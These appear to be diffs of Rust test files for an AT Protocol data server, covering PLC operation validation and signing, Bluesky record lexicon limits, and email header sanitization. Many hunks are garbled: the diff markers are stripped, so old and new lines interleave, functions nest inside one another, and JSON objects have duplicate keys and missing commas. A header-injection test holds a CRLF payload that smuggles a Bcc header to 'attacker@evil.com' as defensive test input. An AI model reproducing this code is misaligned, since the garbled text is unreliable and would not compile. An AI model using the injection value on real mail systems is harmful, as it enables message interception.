    // alsoKnownAs is mandatory for plc_operation records.
    let op_without_aka = json!({
        "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "services": {}, "sig": "test"
    });
    assert!(matches!(
        validate_plc_operation(&op_without_aka),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("alsoKnownAs")
    ));
}
#[test]
fn test_validate_plc_operation_missing_services() {
    // services is mandatory for plc_operation records.
    let op_without_services = json!({
        "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "sig": "test"
    });
    assert!(matches!(
        validate_plc_operation(&op_without_services),
        Err(PlcError::InvalidResponse(msg)) if msg.contains("services")
    ));
}
#[test]
fn test_plc_submission_validation() {
    // Submission-time validation cross-checks the operation against server
    // expectations: rotation key, signing key, handle, service type, endpoint.
    let key = SigningKey::random(&mut rand::thread_rng());
    let did_key = signing_key_to_did_key(&key);
    let server_key = "did:key:zServer123";
    // Helper closure: build an operation with the given key/handle/service fields.
    let base_op = |rotation_key: &str, signing_key: &str, handle: &str, service_type: &str, endpoint: &str| json!({
        "type": "plc_operation",
        "rotationKeys": [rotation_key],
        "verificationMethods": {"atproto": signing_key},
        "alsoKnownAs": [format!("at://{}", handle)],
        "services": { "atproto_pds": { "type": service_type, "endpoint": endpoint } },
        "sig": "test"
    });
    // The server's rotation key is absent from the operation -> rejected.
    let ctx = PlcValidationContext {
        server_rotation_key: server_key.to_string(),
        expected_signing_key: did_key.clone(),
        expected_handle: "test.handle".to_string(),
        expected_pds_endpoint: "https://pds.example.com".to_string(),
    };
    let op = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
    assert!(matches!(validate_plc_operation_for_submission(&op, &ctx), Err(PlcError::InvalidResponse(msg)) if msg.contains("rotation key")));
    // Context where the user's key IS the server rotation key: only the
    // specifically-wrong field should now trigger rejection.
    let ctx_with_user_key = PlcValidationContext {
        server_rotation_key: did_key.clone(),
        expected_signing_key: did_key.clone(),
        expected_handle: "test.handle".to_string(),
        expected_pds_endpoint: "https://pds.example.com".to_string(),
    };
    let wrong_signing = base_op(&did_key, "did:key:zWrongKey", "test.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
    assert!(matches!(validate_plc_operation_for_submission(&wrong_signing, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("signing key")));
    let wrong_handle = base_op(&did_key, &did_key, "wrong.handle", "AtprotoPersonalDataServer", "https://pds.example.com");
    assert!(matches!(validate_plc_operation_for_submission(&wrong_handle, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("handle")));
    let wrong_service_type = base_op(&did_key, &did_key, "test.handle", "WrongServiceType", "https://pds.example.com");
    assert!(matches!(validate_plc_operation_for_submission(&wrong_service_type, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("type")));
    let wrong_endpoint = base_op(&did_key, &did_key, "test.handle", "AtprotoPersonalDataServer", "https://wrong.endpoint.com");
    assert!(matches!(validate_plc_operation_for_submission(&wrong_endpoint, &ctx_with_user_key), Err(PlcError::InvalidResponse(msg)) if msg.contains("endpoint")));
}
#[test]
fn test_signature_verification() {
    // End-to-end signature checks: a signed operation verifies against the
    // signing key, fails against a different key or a malformed did:key, and
    // malformed sig fields produce explicit errors.
    let key = SigningKey::random(&mut rand::thread_rng());
    let did_key = signing_key_to_did_key(&key);
    let op = json!({
        "type": "plc_operation", "rotationKeys": [did_key.clone()],
        "verificationMethods": {}, "alsoKnownAs": [], "services": {}, "prev": null
    });
    let signed = sign_operation(&op, &key).unwrap();
    // Correct rotation key -> verifies true.
    let result = verify_operation_signature(&signed, &[did_key.clone()]);
    assert!(result.is_ok() && result.unwrap());
    // A different key -> verifies false (not an error).
    let other_key = SigningKey::random(&mut rand::thread_rng());
    let other_did = signing_key_to_did_key(&other_key);
    let result = verify_operation_signature(&signed, &[other_did]);
    assert!(result.is_ok() && !result.unwrap());
    // A non-did:key entry is skipped, so verification simply fails.
    let result = verify_operation_signature(&signed, &["not-a-did-key".to_string()]);
    assert!(result.is_ok() && !result.unwrap());
    // A missing sig field is a structural error, not a false result.
    let missing_sig = json!({ "type": "plc_operation", "rotationKeys": [], "verificationMethods": {}, "alsoKnownAs": [], "services": {} });
    assert!(matches!(verify_operation_signature(&missing_sig, &[]), Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
    // A sig that is not valid base64 is likewise a structural error.
    let invalid_base64 = json!({
        "type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
        "alsoKnownAs": [], "services": {}, "sig": "not-valid-base64!!!"
    });
    assert!(matches!(verify_operation_signature(&invalid_base64, &[]), Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_verify_signature_invalid_did_key_format() {
    // A rotation-key entry that is not a did:key should not error out;
    // verification simply reports "no match".
    let key = SigningKey::random(&mut rand::thread_rng());
    let op = json!({
        "type": "plc_operation",
        "rotationKeys": [],
        "verificationMethods": {},
        "alsoKnownAs": [],
        "services": {},
        "prev": null
    });
    let signed = sign_operation(&op, &key).unwrap();
    let result = verify_operation_signature(&signed, &["not-a-did-key".to_string()]);
    assert!(result.is_ok());
    assert!(!result.unwrap());
}
#[test]
fn test_tombstone_validation() {
    // A plc_tombstone only needs prev + sig; it must pass structural validation.
    let tombstone = json!({
        "type": "plc_tombstone",
        "prev": "bafyreig6xxxxxyyyyyzzzzzz",
        "sig": "test"
    });
    assert!(validate_plc_operation(&tombstone).is_ok());
}
#[test]
fn test_cid_and_key_utilities() {
    // CID derivation must be deterministic, content-addressed (differs when the
    // data differs), and use the dag-cbor + sha256 multicodec prefix.
    let value = json!({ "alpha": 1, "beta": 2 });
    let cid1 = cid_for_cbor(&value).unwrap();
    let cid2 = cid_for_cbor(&value).unwrap();
    assert_eq!(cid1, cid2, "CID should be deterministic");
    assert!(cid1.starts_with("bafyrei"), "CID should be dag-cbor + sha256");
    let value2 = json!({ "alpha": 999 });
    let cid3 = cid_for_cbor(&value2).unwrap();
    assert_ne!(cid1, cid3, "Different data should produce different CIDs");
    // did:key derivation: correct multibase prefix, stable per key, unique per key.
    let key = SigningKey::random(&mut rand::thread_rng());
    let did = signing_key_to_did_key(&key);
    assert!(did.starts_with("did:key:z") && did.len() > 50);
    assert_eq!(did, signing_key_to_did_key(&key), "Same key should produce same did");
    let key2 = SigningKey::random(&mut rand::thread_rng());
    assert_ne!(did, signing_key_to_did_key(&key2), "Different keys should produce different dids");
}
#[test]
fn test_tombstone_operations() {
    // Tombstones pass both structural validation and submission validation
    // (the handle/endpoint/service checks only apply to plc_operation).
    let tombstone = json!({ "type": "plc_tombstone", "prev": "bafyreig6xxxxxyyyyyzzzzzz", "sig": "test" });
    assert!(validate_plc_operation(&tombstone).is_ok());
    let key = SigningKey::random(&mut rand::thread_rng());
    let did_key = signing_key_to_did_key(&key);
    let ctx = PlcValidationContext {
        server_rotation_key: did_key.clone(),
        expected_signing_key: did_key,
        expected_handle: "test.handle".to_string(),
        expected_pds_endpoint: "https://pds.example.com".to_string(),
    };
    assert!(validate_plc_operation_for_submission(&tombstone, &ctx).is_ok());
}
#[test]
fn test_verify_signature_missing_sig() {
fn test_sign_operation_and_struct() {
let key = SigningKey::random(&mut rand::thread_rng());
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {}
"type": "plc_operation", "rotationKeys": [], "verificationMethods": {},
"alsoKnownAs": [], "services": {}, "prev": null, "sig": "old_signature"
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(msg)) if msg.contains("sig")));
}
let signed = sign_operation(&op, &key).unwrap();
assert_ne!(signed.get("sig").and_then(|v| v.as_str()).unwrap(), "old_signature");
#[test]
fn test_verify_signature_invalid_base64() {
let op = json!({
"type": "plc_operation",
"rotationKeys": [],
"verificationMethods": {},
"alsoKnownAs": [],
"services": {},
"sig": "not-valid-base64!!!"
});
let result = verify_operation_signature(&op, &[]);
assert!(matches!(result, Err(PlcError::InvalidResponse(_))));
}
#[test]
fn test_plc_operation_struct() {
let mut services = HashMap::new();
services.insert(
"atproto_pds".to_string(),
PlcService {
service_type: "AtprotoPersonalDataServer".to_string(),
endpoint: "https://pds.example.com".to_string(),
},
);
services.insert("atproto_pds".to_string(), PlcService {
service_type: "AtprotoPersonalDataServer".to_string(),
endpoint: "https://pds.example.com".to_string(),
});
let mut verification_methods = HashMap::new();
verification_methods.insert("atproto".to_string(), "did:key:zTest123".to_string());
let op = PlcOperation {

View File

@@ -9,187 +9,117 @@ fn now() -> String {
}
#[test]
fn test_post_record_validation() {
    // app.bsky.feed.post lexicon limits: required text/createdAt,
    // text <= 3000 chars, langs <= 3, tags <= 8, each tag <= 640 chars.
    let validator = RecordValidator::new();
    let valid_post = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello world!",
        "createdAt": now()
    });
    assert_eq!(validator.validate(&valid_post, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
    let missing_text = json!({
        "$type": "app.bsky.feed.post",
        "createdAt": now()
    });
    assert!(matches!(validator.validate(&missing_text, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "text"));
    let missing_created_at = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello"
    });
    assert!(matches!(validator.validate(&missing_created_at, "app.bsky.feed.post"), Err(ValidationError::MissingField(f)) if f == "createdAt"));
    // Text length: one past the limit fails, exactly at the limit passes.
    let text_too_long = json!({
        "$type": "app.bsky.feed.post",
        "text": "a".repeat(3001),
        "createdAt": now()
    });
    assert!(matches!(validator.validate(&text_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "text"));
    let text_at_limit = json!({
        "$type": "app.bsky.feed.post",
        "text": "a".repeat(3000),
        "createdAt": now()
    });
    assert_eq!(validator.validate(&text_at_limit, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
    // Languages: 4 is over the limit, 3 is allowed.
    let too_many_langs = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello",
        "createdAt": now(),
        "langs": ["en", "fr", "de", "es"]
    });
    assert!(matches!(validator.validate(&too_many_langs, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "langs"));
    let three_langs_ok = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello",
        "createdAt": now(),
        "langs": ["en", "fr", "de"]
    });
    assert_eq!(validator.validate(&three_langs_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
    // Tags: 9 is over the limit, 8 is allowed, and each tag has a length cap.
    let too_many_tags = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello",
        "createdAt": now(),
        "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8", "tag9"]
    });
    assert!(matches!(validator.validate(&too_many_tags, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path == "tags"));
    let eight_tags_ok = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello",
        "createdAt": now(),
        "tags": ["tag1", "tag2", "tag3", "tag4", "tag5", "tag6", "tag7", "tag8"]
    });
    assert_eq!(validator.validate(&eight_tags_ok, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
    let tag_too_long = json!({
        "$type": "app.bsky.feed.post",
        "text": "Hello",
        "createdAt": now(),
        "tags": ["t".repeat(641)]
    });
    assert!(matches!(validator.validate(&tag_too_long, "app.bsky.feed.post"), Err(ValidationError::InvalidField { path, .. }) if path.starts_with("tags/")));
}
#[test]
fn test_profile_record_validation() {
    // app.bsky.actor.profile lexicon limits: all fields optional,
    // displayName <= 640 chars, description <= 2560 chars.
    let validator = RecordValidator::new();
    let valid = json!({
        "$type": "app.bsky.actor.profile",
        "displayName": "Test User",
        "description": "A test user profile"
    });
    assert_eq!(validator.validate(&valid, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
    // A profile with no optional fields at all is still valid.
    let empty_ok = json!({
        "$type": "app.bsky.actor.profile"
    });
    assert_eq!(validator.validate(&empty_ok, "app.bsky.actor.profile").unwrap(), ValidationStatus::Valid);
    let displayname_too_long = json!({
        "$type": "app.bsky.actor.profile",
        "displayName": "n".repeat(641)
    });
    assert!(matches!(validator.validate(&displayname_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
    let description_too_long = json!({
        "$type": "app.bsky.actor.profile",
        "description": "d".repeat(2561)
    });
    assert!(matches!(validator.validate(&description_too_long, "app.bsky.actor.profile"), Err(ValidationError::InvalidField { path, .. }) if path == "description"));
}
#[test]
fn test_validate_like_valid() {
fn test_like_and_repost_validation() {
let validator = RecordValidator::new();
let like = json!({
let valid_like = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
@@ -197,39 +127,24 @@ fn test_validate_like_valid() {
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_like, "app.bsky.feed.like").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_like_missing_subject() {
let validator = RecordValidator::new();
let like = json!({
let missing_subject = json!({
"$type": "app.bsky.feed.like",
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
assert!(matches!(validator.validate(&missing_subject, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f == "subject"));
#[test]
fn test_validate_like_missing_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
let missing_subject_uri = json!({
"$type": "app.bsky.feed.like",
"subject": {
"cid": "bafyreig6xxxxxyyyyyzzzzzz"
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f.contains("uri")));
}
assert!(matches!(validator.validate(&missing_subject_uri, "app.bsky.feed.like"), Err(ValidationError::MissingField(f)) if f.contains("uri")));
#[test]
fn test_validate_like_invalid_subject_uri() {
let validator = RecordValidator::new();
let like = json!({
let invalid_subject_uri = json!({
"$type": "app.bsky.feed.like",
"subject": {
"uri": "https://example.com/not-at-uri",
@@ -237,16 +152,9 @@ fn test_validate_like_invalid_subject_uri() {
},
"createdAt": now()
});
let result = validator.validate(&like, "app.bsky.feed.like");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path.contains("uri"))
);
}
assert!(matches!(validator.validate(&invalid_subject_uri, "app.bsky.feed.like"), Err(ValidationError::InvalidField { path, .. }) if path.contains("uri")));
#[test]
fn test_validate_repost_valid() {
let validator = RecordValidator::new();
let repost = json!({
let valid_repost = json!({
"$type": "app.bsky.feed.repost",
"subject": {
"uri": "at://did:plc:test/app.bsky.feed.post/123",
@@ -254,355 +162,220 @@ fn test_validate_repost_valid() {
},
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_repost, "app.bsky.feed.repost").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_repost_missing_subject() {
let validator = RecordValidator::new();
let repost = json!({
let repost_missing_subject = json!({
"$type": "app.bsky.feed.repost",
"createdAt": now()
});
let result = validator.validate(&repost, "app.bsky.feed.repost");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
assert!(matches!(validator.validate(&repost_missing_subject, "app.bsky.feed.repost"), Err(ValidationError::MissingField(f)) if f == "subject"));
}
#[test]
fn test_validate_follow_valid() {
fn test_follow_and_block_validation() {
let validator = RecordValidator::new();
let follow = json!({
let valid_follow = json!({
"$type": "app.bsky.graph.follow",
"subject": "did:plc:test12345",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_follow, "app.bsky.graph.follow").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_follow_missing_subject() {
let validator = RecordValidator::new();
let follow = json!({
let missing_follow_subject = json!({
"$type": "app.bsky.graph.follow",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::MissingField(f)) if f == "subject"));
}
assert!(matches!(validator.validate(&missing_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::MissingField(f)) if f == "subject"));
#[test]
fn test_validate_follow_invalid_subject() {
let validator = RecordValidator::new();
let follow = json!({
let invalid_follow_subject = json!({
"$type": "app.bsky.graph.follow",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&follow, "app.bsky.graph.follow");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
assert!(matches!(validator.validate(&invalid_follow_subject, "app.bsky.graph.follow"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
#[test]
fn test_validate_block_valid() {
let validator = RecordValidator::new();
let block = json!({
let valid_block = json!({
"$type": "app.bsky.graph.block",
"subject": "did:plc:blocked123",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_block, "app.bsky.graph.block").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_block_invalid_subject() {
let validator = RecordValidator::new();
let block = json!({
let invalid_block_subject = json!({
"$type": "app.bsky.graph.block",
"subject": "not-a-did",
"createdAt": now()
});
let result = validator.validate(&block, "app.bsky.graph.block");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
assert!(matches!(validator.validate(&invalid_block_subject, "app.bsky.graph.block"), Err(ValidationError::InvalidField { path, .. }) if path == "subject"));
}
#[test]
fn test_validate_list_valid() {
fn test_list_and_graph_records_validation() {
let validator = RecordValidator::new();
let list = json!({
let valid_list = json!({
"$type": "app.bsky.graph.list",
"name": "My List",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_list, "app.bsky.graph.list").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_list_name_too_long() {
let validator = RecordValidator::new();
let long_name = "n".repeat(65);
let list = json!({
let list_name_too_long = json!({
"$type": "app.bsky.graph.list",
"name": long_name,
"name": "n".repeat(65),
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
}
assert!(matches!(validator.validate(&list_name_too_long, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
#[test]
fn test_validate_list_empty_name() {
let validator = RecordValidator::new();
let list = json!({
let list_empty_name = json!({
"$type": "app.bsky.graph.list",
"name": "",
"purpose": "app.bsky.graph.defs#modlist",
"createdAt": now()
});
let result = validator.validate(&list, "app.bsky.graph.list");
assert!(matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "name"));
assert!(matches!(validator.validate(&list_empty_name, "app.bsky.graph.list"), Err(ValidationError::InvalidField { path, .. }) if path == "name"));
let valid_list_item = json!({
"$type": "app.bsky.graph.listitem",
"subject": "did:plc:test123",
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
"createdAt": now()
});
assert_eq!(validator.validate(&valid_list_item, "app.bsky.graph.listitem").unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_feed_generator_valid() {
fn test_misc_record_types_validation() {
let validator = RecordValidator::new();
let generator = json!({
let valid_generator = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": "My Feed",
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_generator, "app.bsky.feed.generator").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_feed_generator_displayname_too_long() {
let validator = RecordValidator::new();
let long_name = "f".repeat(241);
let generator = json!({
let generator_displayname_too_long = json!({
"$type": "app.bsky.feed.generator",
"did": "did:web:example.com",
"displayName": long_name,
"displayName": "f".repeat(241),
"createdAt": now()
});
let result = validator.validate(&generator, "app.bsky.feed.generator");
assert!(
matches!(result, Err(ValidationError::InvalidField { path, .. }) if path == "displayName")
);
}
assert!(matches!(validator.validate(&generator_displayname_too_long, "app.bsky.feed.generator"), Err(ValidationError::InvalidField { path, .. }) if path == "displayName"));
#[test]
fn test_validate_unknown_type_returns_unknown() {
let validator = RecordValidator::new();
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert_eq!(result.unwrap(), ValidationStatus::Unknown);
}
#[test]
fn test_validate_unknown_type_strict_rejects() {
let validator = RecordValidator::new().require_lexicon(true);
let custom = json!({
"$type": "com.custom.record",
"data": "test"
});
let result = validator.validate(&custom, "com.custom.record");
assert!(matches!(result, Err(ValidationError::UnknownType(_))));
}
#[test]
fn test_validate_type_mismatch() {
let validator = RecordValidator::new();
let record = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://test", "cid": "bafytest"},
"createdAt": now()
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(
matches!(result, Err(ValidationError::TypeMismatch { expected, actual })
if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like")
);
}
#[test]
fn test_validate_missing_type() {
let validator = RecordValidator::new();
let record = json!({
"text": "Hello"
});
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::MissingType)));
}
#[test]
fn test_validate_not_object() {
let validator = RecordValidator::new();
let record = json!("just a string");
let result = validator.validate(&record, "app.bsky.feed.post");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_datetime_format_valid() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00.000Z"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_datetime_with_offset() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00+05:30"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_datetime_invalid_format() {
let validator = RecordValidator::new();
let post = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024/01/15"
});
let result = validator.validate(&post, "app.bsky.feed.post");
assert!(matches!(
result,
Err(ValidationError::InvalidDatetime { .. })
));
}
#[test]
fn test_validate_record_key_valid() {
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key("valid-key").is_ok());
assert!(validate_record_key("valid_key").is_ok());
assert!(validate_record_key("valid.key").is_ok());
assert!(validate_record_key("valid~key").is_ok());
assert!(validate_record_key("self").is_ok());
}
#[test]
fn test_validate_record_key_empty() {
let result = validate_record_key("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_dot() {
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
}
#[test]
fn test_validate_record_key_invalid_chars() {
assert!(validate_record_key("invalid/key").is_err());
assert!(validate_record_key("invalid key").is_err());
assert!(validate_record_key("invalid@key").is_err());
assert!(validate_record_key("invalid#key").is_err());
}
#[test]
fn test_validate_record_key_too_long() {
let long_key = "k".repeat(513);
let result = validate_record_key(&long_key);
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_record_key_at_max_length() {
let max_key = "k".repeat(512);
assert!(validate_record_key(&max_key).is_ok());
}
#[test]
fn test_validate_collection_nsid_valid() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("a.b.c").is_ok());
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
}
#[test]
fn test_validate_collection_nsid_empty() {
let result = validate_collection_nsid("");
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
}
#[test]
fn test_validate_collection_nsid_too_few_segments() {
assert!(validate_collection_nsid("a").is_err());
assert!(validate_collection_nsid("a.b").is_err());
}
#[test]
fn test_validate_collection_nsid_empty_segment() {
assert!(validate_collection_nsid("a..b.c").is_err());
assert!(validate_collection_nsid(".a.b.c").is_err());
assert!(validate_collection_nsid("a.b.c.").is_err());
}
#[test]
fn test_validate_collection_nsid_invalid_chars() {
assert!(validate_collection_nsid("a.b.c/d").is_err());
assert!(validate_collection_nsid("a.b.c_d").is_err());
assert!(validate_collection_nsid("a.b.c@d").is_err());
}
#[test]
fn test_validate_threadgate() {
let validator = RecordValidator::new();
let gate = json!({
let valid_threadgate = json!({
"$type": "app.bsky.feed.threadgate",
"post": "at://did:plc:test/app.bsky.feed.post/123",
"createdAt": now()
});
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
}
assert_eq!(validator.validate(&valid_threadgate, "app.bsky.feed.threadgate").unwrap(), ValidationStatus::Valid);
#[test]
fn test_validate_labeler_service() {
let validator = RecordValidator::new();
let labeler = json!({
let valid_labeler = json!({
"$type": "app.bsky.labeler.service",
"policies": {
"labelValues": ["spam", "nsfw"]
},
"createdAt": now()
});
let result = validator.validate(&labeler, "app.bsky.labeler.service");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
assert_eq!(validator.validate(&valid_labeler, "app.bsky.labeler.service").unwrap(), ValidationStatus::Valid);
}
#[test]
fn test_validate_list_item() {
fn test_type_and_format_validation() {
let validator = RecordValidator::new();
let item = json!({
"$type": "app.bsky.graph.listitem",
"subject": "did:plc:test123",
"list": "at://did:plc:owner/app.bsky.graph.list/mylist",
let strict_validator = RecordValidator::new().require_lexicon(true);
let custom_record = json!({
"$type": "com.custom.record",
"data": "test"
});
assert_eq!(validator.validate(&custom_record, "com.custom.record").unwrap(), ValidationStatus::Unknown);
assert!(matches!(strict_validator.validate(&custom_record, "com.custom.record"), Err(ValidationError::UnknownType(_))));
let type_mismatch = json!({
"$type": "app.bsky.feed.like",
"subject": {"uri": "at://test", "cid": "bafytest"},
"createdAt": now()
});
let result = validator.validate(&item, "app.bsky.graph.listitem");
assert_eq!(result.unwrap(), ValidationStatus::Valid);
assert!(matches!(
validator.validate(&type_mismatch, "app.bsky.feed.post"),
Err(ValidationError::TypeMismatch { expected, actual }) if expected == "app.bsky.feed.post" && actual == "app.bsky.feed.like"
));
let missing_type = json!({
"text": "Hello"
});
assert!(matches!(validator.validate(&missing_type, "app.bsky.feed.post"), Err(ValidationError::MissingType)));
let not_object = json!("just a string");
assert!(matches!(validator.validate(&not_object, "app.bsky.feed.post"), Err(ValidationError::InvalidRecord(_))));
let valid_datetime = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00.000Z"
});
assert_eq!(validator.validate(&valid_datetime, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
let datetime_with_offset = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024-01-15T10:30:00+05:30"
});
assert_eq!(validator.validate(&datetime_with_offset, "app.bsky.feed.post").unwrap(), ValidationStatus::Valid);
let invalid_datetime = json!({
"$type": "app.bsky.feed.post",
"text": "Test",
"createdAt": "2024/01/15"
});
assert!(matches!(validator.validate(&invalid_datetime, "app.bsky.feed.post"), Err(ValidationError::InvalidDatetime { .. })));
}
#[test]
fn test_record_key_validation() {
assert!(validate_record_key("3k2n5j2").is_ok());
assert!(validate_record_key("valid-key").is_ok());
assert!(validate_record_key("valid_key").is_ok());
assert!(validate_record_key("valid.key").is_ok());
assert!(validate_record_key("valid~key").is_ok());
assert!(validate_record_key("self").is_ok());
assert!(matches!(validate_record_key(""), Err(ValidationError::InvalidRecord(_))));
assert!(validate_record_key(".").is_err());
assert!(validate_record_key("..").is_err());
assert!(validate_record_key("invalid/key").is_err());
assert!(validate_record_key("invalid key").is_err());
assert!(validate_record_key("invalid@key").is_err());
assert!(validate_record_key("invalid#key").is_err());
assert!(matches!(validate_record_key(&"k".repeat(513)), Err(ValidationError::InvalidRecord(_))));
assert!(validate_record_key(&"k".repeat(512)).is_ok());
}
#[test]
fn test_collection_nsid_validation() {
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
assert!(validate_collection_nsid("com.atproto.repo.record").is_ok());
assert!(validate_collection_nsid("a.b.c").is_ok());
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
assert!(matches!(validate_collection_nsid(""), Err(ValidationError::InvalidRecord(_))));
assert!(validate_collection_nsid("a").is_err());
assert!(validate_collection_nsid("a.b").is_err());
assert!(validate_collection_nsid("a..b.c").is_err());
assert!(validate_collection_nsid(".a.b.c").is_err());
assert!(validate_collection_nsid("a.b.c.").is_err());
assert!(validate_collection_nsid("a.b.c/d").is_err());
assert!(validate_collection_nsid("a.b.c_d").is_err());
assert!(validate_collection_nsid("a.b.c@d").is_err());
}

View File

@@ -4,145 +4,70 @@ use bspds::notifications::{SendError, is_valid_phone_number, sanitize_header_val
use bspds::oauth::templates::{error_page, login_page, success_page};
#[test]
fn test_sanitize_header_value_removes_crlf() {
fn test_header_injection_sanitization() {
let malicious = "Injected\r\nBcc: attacker@evil.com";
let sanitized = sanitize_header_value(malicious);
assert!(!sanitized.contains('\r'), "CR should be removed");
assert!(!sanitized.contains('\n'), "LF should be removed");
assert!(
sanitized.contains("Injected"),
"Original content should be preserved"
);
assert!(
sanitized.contains("Bcc:"),
